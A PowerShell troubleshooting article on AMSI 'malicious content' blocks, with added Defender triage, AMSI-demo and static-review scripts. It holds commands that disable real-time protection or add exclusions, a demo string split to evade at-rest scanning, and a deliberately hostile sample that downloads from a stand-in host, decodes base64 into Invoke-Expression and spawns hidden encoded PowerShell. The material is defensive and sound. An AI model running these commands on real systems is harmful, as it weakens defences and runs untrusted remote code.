This script contains malicious content

DodaTech 3 min read

The full message PowerShell prints is “This script contains malicious content and has been blocked by your antivirus software.” It means that Microsoft Defender Antivirus, or another antivirus registered as an AMSI provider, inspected the script content as PowerShell was about to run it and returned a malware verdict, so PowerShell refused to execute it. The error is reported as a parse error with FullyQualifiedErrorId ScriptContainedMaliciousContent.

What It Means

PowerShell is a powerful automation platform that attackers routinely abuse to run malicious code. Microsoft Defender Antivirus combines signature matching, behaviour monitoring and AMSI (Antimalware Scan Interface): PowerShell hands each script block to the antivirus through AMSI just before running it, so the engine sees the code in the form that will actually execute. When that content matches a known malware pattern or shows suspicious traits, such as heavy obfuscation, base64 decoding fed into Invoke-Expression, or direct Win32 API calls, the engine returns a detection and PowerShell aborts with this message.

Why It Happens

  • Windows Defender real-time protection is on, so its AMSI provider scans every script block PowerShell runs.
  • The script contains constructs that commonly appear in malware: -EncodedCommand or other base64 blobs decoded at run time, Invoke-Expression (IEX) of downloaded or assembled strings, obfuscated strings, or Win32 API calls through Add-Type or reflection.
  • The script, or code it downloads and executes, matches a malware signature or the heuristic engine's model of unwanted behaviour.
  • The script is genuinely malicious.
  • Not this error, but often confused with it: a script carrying the Mark-of-the-Web under the RemoteSigned policy fails with “is not digitally signed”, and the Restricted policy fails with “running scripts is disabled on this system”. Those are execution-policy errors, not antivirus detections, and the fixes for them (unblocking, signing, bypassing the policy) do not change an AMSI verdict.

How to Fix It

1. Verify the script is safe

# Read the script before doing anything else and look for the constructs listed above
Get-Content .\script.ps1

# Ask Defender what it saw: scan the file on demand, then list the most recent detections
Start-MpScan -ScanType CustomScan -ScanPath "$PWD\script.ps1"
Get-MpThreatDetection | Sort-Object InitialDetectionTime -Descending | Select-Object -First 5

# For a second opinion, download Microsoft Safety Scanner and run it; downloading alone scans nothing
Invoke-WebRequest -Uri "https://aka.ms/safety_scanner" -OutFile "MSERT.exe"
.\MSERT.exe

2. Unblock a downloaded script

This removes the Zone.Identifier stream that browsers attach to downloads. It fixes the “is not digitally signed” error under the RemoteSigned policy; it does not change an AMSI verdict, because Defender scans the content, not the zone marker.

# Remove the Mark-of-the-Web
Unblock-File -Path .\script.ps1

3. Add an exclusion to Windows Defender

Only for code you have reviewed and are sure about. Exclude the narrowest folder possible and never the whole .ps1 extension: an extension exclusion exempts every PowerShell script on the machine from file scanning, which is exactly the change an attacker would make. Exclusions are matched on a file path, so do not expect one to cover code that is decoded in memory and handed to Invoke-Expression.

# Add a folder exclusion (run as Administrator)
Add-MpPreference -ExclusionPath "C:\MyScripts"

# Remove it again when the work is done
Remove-MpPreference -ExclusionPath "C:\MyScripts"

# Avoid: this exempts every .ps1 file on the machine
Add-MpPreference -ExclusionExtension ".ps1"

4. Sign your script with a code-signing certificate

Signing satisfies the AllSigned and RemoteSigned execution policies; it has no effect on an AMSI verdict. A self-signed certificate is only trusted on machines where it has been imported into Trusted Root Certification Authorities and Trusted Publishers; until then Get-AuthenticodeSignature reports the chain as untrusted.

# Create a self-signed code-signing certificate (for testing only; it is stored in Cert:\CurrentUser\My)
$cert = New-SelfSignedCertificate -Subject "CN=MyScriptSigning" -Type CodeSigningCert

# Sign the script, then check the signature status
Set-AuthenticodeSignature -FilePath .\script.ps1 -Certificate $cert
Get-AuthenticodeSignature -FilePath .\script.ps1 | Select-Object Status, StatusMessage

5. Bypass the execution policy for one run (use with caution)

This overrides the execution policy for that process only. AMSI still scans every script block, so it does not get a script past “malicious content”.

# Bypass execution policy for a single script
powershell.exe -ExecutionPolicy Bypass -File .\script.ps1

6. Temporarily disable real-time monitoring (admin only)

Defender's AMSI provider runs as part of real-time protection, so this does stop the block. It is also precisely the step malware scripts attempt, so a script containing this line may itself trigger a detection, and with Tamper Protection enabled the command has no effect. Defender turns real-time protection back on by itself after a while, but re-enable it yourself as soon as the test is finished.

# Temporarily disable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true

# Re-enable it immediately after testing
Set-MpPreference -DisableRealtimeMonitoring $false
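
The checks behind steps 1 to 4, as one triage script added here as an example (it is not code from the original page or from DodaTech). It assumes Microsoft Defender Antivirus with its PowerShell module (Get-MpComputerStatus, Start-MpScan, Get-MpThreatDetection, Get-MpThreat) and an elevated session; .\script.ps1 is a placeholder path.

```powershell
# Added example, not from the original page. Triage for a script that PowerShell
# refused with "This script contains malicious content". Assumes Microsoft Defender
# Antivirus and its PowerShell module; run from an elevated session.
# $Path is a placeholder: point it at the script that was blocked.
param([string]$Path = '.\script.ps1')

$file = Get-Item -LiteralPath $Path

# 1. Is the real-time engine that hosts Defender's AMSI provider on, and are signatures current?
$status = Get-MpComputerStatus
[pscustomobject]@{
    RealTimeProtection = $status.RealTimeProtectionEnabled
    SignatureVersion   = $status.AntivirusSignatureVersion
    SignatureAgeDays   = $status.AntivirusSignatureAge
} | Format-List

# 2. Scan the file on demand, then show the most recent detections with their threat names.
#    An AMSI detection typically lists an "amsi:" resource naming the PowerShell executable,
#    because Defender saw the content in memory; a file scan can therefore come back clean
#    even though the same script is blocked at run time.
Start-MpScan -ScanType CustomScan -ScanPath $file.FullName
$names = @{}
Get-MpThreat | ForEach-Object { $names[[string]$_.ThreatID] = $_.ThreatName }
Get-MpThreatDetection |
    Sort-Object InitialDetectionTime -Descending |
    Select-Object -First 5 -Property InitialDetectionTime, ProcessName,
        @{ n = 'ThreatName'; e = { $names[[string]$_.ThreatID] } },
        @{ n = 'Resources';  e = { $_.Resources -join '; ' } }

# 3. Rule out the two errors people confuse with the AMSI block: the Mark-of-the-Web
#    (Zone.Identifier alternate data stream) and the execution policy / signature state.
$zone = Get-Content -LiteralPath $file.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
if ($zone) { 'Mark-of-the-Web present: ' + ($zone -join ' | ') } else { 'No Mark-of-the-Web on this file' }
Get-ExecutionPolicy -List
Get-AuthenticodeSignature -FilePath $file.FullName | Select-Object Status, StatusMessage
```

If step 2 shows a recent detection whose Resources entry points at powershell.exe rather than at the .ps1 file, the verdict came from AMSI on the running content, and none of the file-level fixes (unblocking, signing, a policy bypass) will change it; the flagged construct itself has to go.
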

Does execution policy prevent malicious scripts?

No. The execution policy is not a security boundary; it prevents accidental execution, and anyone can override it for a single process with -ExecutionPolicy Bypass or by piping script text into powershell.exe. Real protection comes from AMSI backed by an antivirus engine, Constrained Language Mode enforced through AppLocker or Windows Defender Application Control, and working day-to-day without administrator rights. The execution policy is a seat belt, not a locked door.
What is AMSI and how does it work in PowerShell?

AMSI (Antimalware Scan Interface) is a Windows interface through which PowerShell hands the content of every script block to the registered antivirus provider (Microsoft Defender by default) just before the block is compiled and run. Because the hand-off happens at execution time, the provider sees the code in the form that will actually run: a base64 blob passed to -EncodedCommand, or decoded and fed to Invoke-Expression, is submitted in its decoded form, so encoding alone hides nothing from AMSI. A string that is still encrypted escapes the first scan, but it is scanned the moment it is decrypted and executed. The provider applies its signatures and heuristics to that text and returns a verdict that PowerShell enforces. AMSI is not a hard boundary, though: the scan happens inside the PowerShell process, and an attacker who already has code execution there can interfere with it, which is one reason Defender also detects well-known AMSI-tampering patterns.
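
An added example (not from the original page) of what AMSI sees when PowerShell runs encoded code, using Microsoft's documented AMSI test sample string, which is harmless text that AMSI-aware antivirus products are expected to flag, much like the EICAR file for file scanners. It assumes Windows with Defender or another AMSI provider active; on a machine without AMSI every call simply reports 'ran'. The function name Test-AmsiVerdict is this example's own.

```powershell
# Added example, not from the original page. Shows what AMSI sees. Needs Windows with
# Defender (or another AMSI provider) active; elsewhere every call just returns 'ran'.
# The string used below is Microsoft's documented AMSI test sample.

function Test-AmsiVerdict {
    param([Parameter(Mandatory)][string]$ScriptText)
    try {
        $null = Invoke-Expression $ScriptText
        return 'ran'
    } catch {
        # PowerShell surfaces the AMSI block as a parse-time error whose
        # FullyQualifiedErrorId is ScriptContainedMaliciousContent.
        if ($_.FullyQualifiedErrorId -like 'ScriptContainedMaliciousContent*' -or
            $_.Exception.Message -match 'malicious content') {
            return 'blocked by AMSI'
        }
        throw
    }
}

# Assembled at run time so that this file, scanned at rest, does not contain the sample
# as one literal; AMSI still sees it whole when Invoke-Expression runs it.
$sample = "'AMSI Test Sample: " + "7e72c3ce-861b-" + "4339-8740-0ac1484c1386'"

# 1. Plain text: scanned as-is.
'plain:   ' + (Test-AmsiVerdict $sample)

# 2. Base64 wrapped in a decoder, the way -EncodedCommand or an IEX one-liner hides code.
#    The wrapper itself contains only base64 and passes the first scan; the decoded text
#    is then handed to Invoke-Expression, which submits it to AMSI again, so the verdict
#    is the same.
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sample))
$wrapper = "Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64')))"
'encoded: ' + (Test-AmsiVerdict $wrapper)

# 3. A benign script block for comparison.
'benign:  ' + (Test-AmsiVerdict "'hello'")
```

With Defender active the first two lines print "blocked by AMSI" and the third "ran". The second case is the point: the outer script block passes because it contains nothing but base64 and a decoder, and the detection fires on the inner block, which is the content PowerShell was actually about to execute.
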

How do I know if my script is really safe?

Review every line, especially anything downloaded or copied from a forum. Look for Invoke-Expression, Start-Process with unusual arguments, -EncodedCommand or long base64 literals, Add-Type or reflection that reaches Win32 APIs, and network connections to hosts you do not recognise. When in doubt, run the script first in Windows Sandbox or a throwaway virtual machine, and use -WhatIf on the cmdlets that support it to preview changes without making them.
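
A first-pass static review along the lines described above, added as an example (not the page's or DodaTech's code). It uses PowerShell's own parser, so the checks run over the syntax tree rather than regex matches on raw text; the watchlists are this example's choices, and the script it reviews is constructed for the demonstration. Because that sample deliberately contains the constructs the page warns about, Defender may flag this example file itself when it is run, which is AMSI doing its job.

```powershell
# Added example, not from the original page: a first-pass static review of a script
# using PowerShell's own parser, done before running the script anywhere. The
# watchlists are this example's choices, not an official list, and the sample script
# at the bottom is constructed for the demonstration.
function Get-ScriptRiskReport {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors) { throw "Script does not parse: $($errors[0].Message)" }

    # Cmdlets (and common aliases) that run, fetch or load code, or weaken defences.
    $watch = @{
        'Invoke-Expression' = 'runs a string as code';  'iex'  = 'runs a string as code'
        'Invoke-WebRequest' = 'fetches remote content';  'iwr'  = 'fetches remote content'
        'Invoke-RestMethod' = 'fetches remote content';  'irm'  = 'fetches remote content'
        'Start-Process'     = 'launches a program';      'saps' = 'launches a program'
        'Add-Type'          = 'compiles and loads .NET code'
        'Add-MpPreference'  = 'adds Defender exclusions'
        'Set-MpPreference'  = 'changes Defender settings'
        'Unblock-File'      = 'removes Mark-of-the-Web'
    }
    # .NET members that download, decode, or load code.
    $members = 'DownloadString', 'DownloadFile', 'DownloadData', 'FromBase64String', 'Load'

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Node, $Item, $Why) {
        $findings.Add([pscustomobject]@{ Line = $Node.Extent.StartLineNumber; Item = $Item; Why = $Why })
    }

    # Every command invocation whose name is known statically.
    foreach ($cmd in $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.CommandAst] }, $true)) {
        $name = $cmd.GetCommandName()
        if (-not $name) { continue }                       # '& $var': target is not static
        if ($watch.ContainsKey($name)) { Add-Finding $cmd $name $watch[$name] }
        # A child PowerShell given -EncodedCommand, including short forms such as -e or -enc.
        if ($name -match '^(powershell|pwsh)(\.exe)?$' -and $cmd.Extent.Text -match '\s-e(c|n[a-z]*)?(\s|$)') {
            Add-Finding $cmd $name 'spawns PowerShell with an encoded command'
        }
    }
    # Method calls on .NET objects and types, e.g. [Convert]::FromBase64String(...).
    foreach ($m in $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.InvokeMemberExpressionAst] }, $true)) {
        $member = $m.Member.Extent.Text
        if ($members -contains $member) {
            $sep = if ($m.Static) { '::' } else { '.' }
            Add-Finding $m "$($m.Expression.Extent.Text)$sep$member" 'download, decode or code load via .NET'
        }
    }
    # String literals: long base64-looking blobs and URLs.
    foreach ($s in $ast.FindAll({ param($n) $n -is [System.Management.Automation.Language.StringConstantExpressionAst] }, $true)) {
        if ($s.Value -match '^[A-Za-z0-9+/]{40,}={0,2}$') {
            Add-Finding $s ($s.Value.Substring(0, 16) + '...') 'long base64-looking literal'
        } elseif ($s.Value -match '^https?://') {
            Add-Finding $s $s.Value 'network endpoint'
        }
    }
    $findings | Sort-Object Line
}

# Constructed sample for the report; it deliberately contains the constructs the page warns about.
# The base64 blob is 'AAA' repeated, not a real payload.
$sample = @'
$r = Invoke-WebRequest -Uri 'http://example.invalid/update.txt'
$dec = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($r.Content))
Invoke-Expression $dec
powershell.exe -NoP -W Hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
Add-MpPreference -ExclusionPath $env:TEMP
Write-Host 'done'
'@
Get-ScriptRiskReport -ScriptText $sample | Format-Table -AutoSize
```

On the sample this reports the download on line 1 (both the cmdlet and the URL), the base64 decode on line 2, the Invoke-Expression on line 3, the encoded child PowerShell and its blob on line 4, and the exclusion on line 5. A report like this is a reading aid, not a verdict: a script with no findings can still be hostile, and a clean finding list is no substitute for running unfamiliar code in a sandbox first.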
